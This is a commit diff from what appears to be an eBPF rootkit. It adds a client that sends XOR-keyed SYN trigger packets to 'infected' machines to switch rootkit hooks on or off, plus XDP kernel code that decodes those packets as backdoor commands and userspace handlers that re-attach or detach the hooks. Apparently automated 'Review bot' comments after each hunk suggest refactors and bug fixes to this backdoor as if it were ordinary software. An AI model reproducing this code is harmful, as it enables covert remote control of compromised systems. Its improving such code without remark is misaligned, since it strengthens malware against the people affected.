Added new hidden packets, commands and rest of structure to activate and deactivate hooks from the backdoor

h3xduck
2022-05-07 19:16:33 -04:00
parent ce7d36371d
commit 5746ac5efb
11 changed files with 1694 additions and 1406 deletions





@@ -188,7 +188,7 @@ void activate_command_control_shell(char* argv){
free(local_ip); free(local_ip);
} }
//Rootkit backdoor V2 //Rootkit backdoor V2 being used - Bvp47 like
void activate_command_control_shell_encrypted(char* argv){ void activate_command_control_shell_encrypted(char* argv){
char* local_ip = getLocalIpAddress(); char* local_ip = getLocalIpAddress();
printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv); printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
@@ -240,9 +240,61 @@ void activate_command_control_shell_encrypted(char* argv){
} }
server_run(8500); server_run(8500);
}
void hook_control_command(char* argv, int mode){
char* local_ip = getLocalIpAddress();
printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
check_ip_address_format(argv);
printf("["KBLU"INFO"RESET"]""Crafting malicious SYN packet...\n");
//+1 since payload must finish with null character for parameter passing, although not sent in the actual packet payload
char payload[CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE+1] = {0};
srand(time(NULL));
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE; ii++){
payload[ii] = (char)rand();
}
//Follow protocol rules
char section[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char section2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char key1[CC_TRIGGER_SYN_PACKET_SECTION_LEN+1] = CC_TRIGGER_SYN_PACKET_KEY_1;
char key2[CC_TRIGGER_SYN_PACKET_SECTION_LEN+1] = CC_TRIGGER_SYN_PACKET_KEY_2;
char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN+1];
//K3 with command to start the encrypted connection with the backdoor
if(mode == 0){
strncpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_DEACTIVATE_ALL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
}else{
strncpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_ACTIVATE_ALL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
}
char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
strncpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
result[ii] = section[ii] ^ key1[ii];
}
strncpy(payload+0x06, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
strncpy(section, payload+0x02, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
result[ii] = section[ii] ^ key2[ii];
}
strncpy(payload+0x0A, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
strncpy(section, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
strncpy(section2, payload+0x0A, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
result[ii] = section[ii] ^ section2[ii] ^ key3[ii];
}
strncpy(payload+0x0C, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
packet_t packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, payload);
printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
//Sending the malicious payload
if(rawsocket_send(packet)<0){
printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
return;
}else{
printf("["KGRN"OK"RESET"]""Secret message successfully sent! No answer expected\n");
}
} }
@@ -264,7 +316,7 @@ void main(int argc, char* argv[]){
char path_arg[512]; char path_arg[512];
//Command line argument parsing //Command line argument parsing
while ((opt = getopt(argc, argv, ":S:c:e:h")) != -1) { while ((opt = getopt(argc, argv, ":S:c:e:u:a:h")) != -1) {
switch (opt) { switch (opt) {
case 'S': case 'S':
print_welcome_message(); print_welcome_message();
@@ -298,6 +350,28 @@ void main(int argc, char* argv[]){
activate_command_control_shell_encrypted(dest_address); activate_command_control_shell_encrypted(dest_address);
PARAM_MODULE_ACTIVATED = 1; PARAM_MODULE_ACTIVATED = 1;
break;
case 'u':
print_welcome_message();
sleep(1);
//Send a secret message
printf("["KBLU"INFO"RESET"]""Deactivating all rootkit hooks\n");
//printf("Option S has argument %s\n", optarg);
strcpy(dest_address, optarg);
hook_control_command(dest_address, 0);
PARAM_MODULE_ACTIVATED = 1;
break;
case 'a':
print_welcome_message();
sleep(1);
//Send a secret message
printf("["KBLU"INFO"RESET"]""Activating all rootkit hooks\n");
//printf("Option S has argument %s\n", optarg);
strcpy(dest_address, optarg);
hook_control_command(dest_address, 1);
PARAM_MODULE_ACTIVATED = 1;
break; break;
/*case 'u': /*case 'u':
print_welcome_message(); print_welcome_message();
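Review bot: The comment above the mode switch in hook_control_command, `//K3 with command to start the encrypted connection with the backdoor`, is carried over from activate_command_control_shell_encrypted and no longer describes the lines below it, where K3 is chosen between CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_DEACTIVATE_ALL and CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_ACTIVATE_ALL according to `mode`. Suggest `//K3 selects the hook command: mode 0 = deactivate all hooks, any other value = activate all hooks`. Beyond the comment, the payload construction in hook_control_command repeats the encrypted-shell function almost line for line with only the K3 constant differing, so a shared helper taking the K3 key would keep the two paths in step. In the new `u` and `a` cases of main, `strcpy(dest_address, optarg);` is an unbounded copy whose destination size is declared outside the hunk; a length-checked form such as `snprintf(dest_address, sizeof dest_address, "%s", optarg);` avoids depending on the caller's argument length. main's body and the remaining cases continue outside the hunk.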




@@ -17,9 +17,13 @@
#define CC_TRIGGER_SYN_PACKET_KEY_1 "\x56\xA4" #define CC_TRIGGER_SYN_PACKET_KEY_1 "\x56\xA4"
#define CC_TRIGGER_SYN_PACKET_KEY_2 "\x78\x13" #define CC_TRIGGER_SYN_PACKET_KEY_2 "\x78\x13"
#define CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL "\x1F\x29" #define CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL "\x1F\x29"
#define CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_ACTIVATE_ALL "\x1D\x25"
#define CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_DEACTIVATE_ALL "\x1D\x24"
#define CC_TRIGGER_SYN_PACKET_SECTION_LEN 0x02 #define CC_TRIGGER_SYN_PACKET_SECTION_LEN 0x02
#define CC_PROT_COMMAND_ENCRYPTED_SHELL 0 #define CC_PROT_COMMAND_ENCRYPTED_SHELL 0
#define CC_PROT_COMMAND_HOOK_ACTIVATE_ALL 1
#define CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL 2
//C&C V3 -- Distributed hidden payload in packet stream //C&C V3 -- Distributed hidden payload in packet stream
struct trigger_t { struct trigger_t {
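Review bot: The new CC_PROT_COMMAND_HOOK_ACTIVATE_ALL and CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL values extend a set of related integer command codes that are switched on both in the XDP program and in the userspace ring-buffer handler, so an `enum` would give them a named, debugger-visible type instead of three bare `#define`s, e.g. `enum cc_prot_command { CC_PROT_COMMAND_ENCRYPTED_SHELL = 0, CC_PROT_COMMAND_HOOK_ACTIVATE_ALL = 1, CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL = 2 };`. The two new K3 string constants also deserve a one-line comment stating that, like the existing ENCRYPTED_SHELL key, each must be exactly CC_TRIGGER_SYN_PACKET_SECTION_LEN bytes long, because every copy that consumes them is sized by that macro rather than by the literal.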


@@ -55,6 +55,10 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo
__builtin_memcpy(section3, payload+0x0C, CC_TRIGGER_SYN_PACKET_SECTION_LEN); __builtin_memcpy(section3, payload+0x0C, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
int correct = 1; int correct = 1;
int command_received = -1; int command_received = -1;
//Checking for a valid K3, which indicates the command sent by the backdoor client
//Not the cleanest code, needs refactoring
//Encrypted shell request
__builtin_memcpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL, CC_TRIGGER_SYN_PACKET_SECTION_LEN); __builtin_memcpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){ for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
result3[ii] = section[ii] ^ section2[ii] ^ section3[ii]; result3[ii] = section[ii] ^ section2[ii] ^ section3[ii];
@@ -65,7 +69,43 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo
if(correct == 1){ if(correct == 1){
//Found valid k3 value //Found valid k3 value
command_received = CC_PROT_COMMAND_ENCRYPTED_SHELL; command_received = CC_PROT_COMMAND_ENCRYPTED_SHELL;
}else{ goto backdoor_finish;
}
correct = 1;
//Hook activate all request
__builtin_memcpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_ACTIVATE_ALL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
result3[ii] = section[ii] ^ section2[ii] ^ section3[ii];
if(result3[ii]!=(key3[ii])){
correct = 0;
}
}
if(correct == 1){
//Found valid k3 value
command_received = CC_PROT_COMMAND_HOOK_ACTIVATE_ALL;
goto backdoor_finish;
}
correct = 1;
//Hook deactivate all request
__builtin_memcpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_DEACTIVATE_ALL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
result3[ii] = section[ii] ^ section2[ii] ^ section3[ii];
if(result3[ii]!=(key3[ii])){
correct = 0;
}
}
if(correct == 1){
//Found valid k3 value
command_received = CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL;
goto backdoor_finish;
}
backdoor_finish:
//Found no valid key 3
if(correct==0){
bpf_printk("FAIL CHECK 3\n"); bpf_printk("FAIL CHECK 3\n");
return XDP_PASS; return XDP_PASS;
} }
@@ -78,6 +118,14 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo
bpf_printk("Received request to start encrypted connection\n"); bpf_printk("Received request to start encrypted connection\n");
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received); ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
break; break;
case CC_PROT_COMMAND_HOOK_ACTIVATE_ALL:
bpf_printk("Received request to activate all hooks\n");
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
break;
case CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL:
bpf_printk("Received request to deactivate all hooks\n");
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
break;
default: default:
bpf_printk("Command received unknown: %d\n", command_received); bpf_printk("Command received unknown: %d\n", command_received);
} }
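Review bot: The three K3 checks in manage_backdoor_trigger_v1 recompute `result3[ii] = section[ii] ^ section2[ii] ^ section3[ii];` once per candidate key although that XOR does not depend on key3, and the compare loop plus `if(correct == 1)` is pasted three times; computing result3 once before the first check and comparing it against each candidate in turn would remove the repetition and the `correct = 1;` resets. The last `goto backdoor_finish;` in the deactivate check is redundant, since the label immediately follows it. The `backdoor_finish:` path relies on `correct==0` holding exactly when no check matched, which is true but implicit; a comment such as `//Reached via goto with a valid K3 (correct==1) or by falling through every check (correct==0)` would make the invariant visible. The function starts and ends outside the hunks.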


@@ -81,3 +81,59 @@ int setup_all_modules(){
return 0; return 0;
} }
int activate_all_modules_config(){
//XDP
module_config.xdp_module.all = ON;
//SCHED
module_config.sched_module.all = ON;
//FS (File system)
module_config.fs_module.all = ON;
//EXEC
module_config.exec_module.all = ON;
return 0;
}
int deactivate_all_modules_config(){
//XDP
module_config.xdp_module.all = OFF;
//SCHED
module_config.sched_module.all = OFF;
//FS (File system)
module_config.fs_module.all = OFF;
//EXEC
module_config.exec_module.all = OFF;
return 0;
}
int unhook_all_modules(){
//Alias
module_config_attr_t attr = module_config_attr;
int ret;
//XDP
ret = detach_xdp_all(attr.skel);
if(ret!=0) return -1;
//SCHED
ret = detach_sched_all(attr.skel);
if(ret!=0) return -1;
//FS (File system)
ret = detach_fs_all(attr.skel);
if(ret!=0) return -1;
//EXEC
detach_exec_all(attr.skel);
if(ret!=0) return -1;
return 0;
}
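Review bot: In unhook_all_modules the EXEC step `detach_exec_all(attr.skel);` discards its return value, so the `if(ret!=0) return -1;` that follows re-tests the result of detach_fs_all, which is already known to be 0 at that point; the line should read `ret = detach_exec_all(attr.skel);` to match the three preceding steps. The function also returns on the first failing detach, leaving any later modules attached without telling the caller which step failed, so either continue through the remaining detaches or document that -1 means a partial teardown. activate_all_modules_config and deactivate_all_modules_config have no failure path and always return 0, while the header comments added in this commit promise -1 on error.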


@@ -71,4 +71,26 @@ extern module_config_attr_t module_config_attr;
*/ */
int setup_all_modules(); int setup_all_modules();
/**
* @brief Removes all hooks, independently on the module_config.
* Useful for reloading the modules.
*
* @return 0 if ok, -1 if error
*/
int unhook_all_modules();
/**
* @brief Sets the module_config with all hooks activated
*
* @return 0 if ok, -1 if error
*/
int activate_all_modules_config();
/**
* @brief Sets the module_config with all hooks deactivated
*
* @return 0 if ok, -1 if error
*/
int deactivate_all_modules_config();
#endif #endif
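Review bot: The `@return 0 if ok, -1 if error` on activate_all_modules_config and deactivate_all_modules_config overstates the contract: their definitions in this commit only assign module_config fields and unconditionally return 0, so the comment should say `@return always 0` unless a real error path is added. The unhook_all_modules brief would read more clearly as `@brief Removes all hooks, regardless of the current module_config.`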


@@ -91,6 +91,7 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
//For time displaying //For time displaying
struct tm *tm; struct tm *tm;
char ts[32]; char ts[32];
int ret;
time_t t; time_t t;
time(&t); time(&t);
tm = localtime(&t); tm = localtime(&t);
@@ -112,6 +113,20 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
//TODO EXTRACT IP FROM KERNEL BUFFER //TODO EXTRACT IP FROM KERNEL BUFFER
printf("Starting encrypted connection\n"); printf("Starting encrypted connection\n");
client_run("127.0.1.1", 8500); client_run("127.0.1.1", 8500);
break;
case CC_PROT_COMMAND_HOOK_ACTIVATE_ALL:
printf("Activating all hooks as requested\n");
activate_all_modules_config();
ret = unhook_all_modules();
if(ret<0) printf("Failed to complete command: unhook all\n");
ret = setup_all_modules();
if(ret<0) printf("Failed to complete command: setup modules\n");
break;
case CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL:
printf("Deactivating all hooks as requested\n");
deactivate_all_modules_config();
ret = unhook_all_modules();
if(ret<0) printf("Failed to complete command: unhook all\n");
break; break;
default: default:
printf("Command received unknown: %d\n", e->code); printf("Command received unknown: %d\n", e->code);
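Review bot: In the new CC_PROT_COMMAND_HOOK_ACTIVATE_ALL case a failing unhook_all_modules is only printed and setup_all_modules still runs, so a partially detached set of programs presumably gets set up again on top of whatever is still attached; if that is intended to be harmless it deserves a comment, otherwise the case should stop, e.g. `if(ret<0){ printf("Failed to complete command: unhook all\n"); break; }`. In the DEACTIVATE_ALL case module_config is switched to OFF before unhook_all_modules runs, so after a failure the config no longer reflects what is actually attached. The return values of activate_all_modules_config and deactivate_all_modules_config are ignored, which matches them always returning 0 in this commit. handle_rb_event begins outside the hunk.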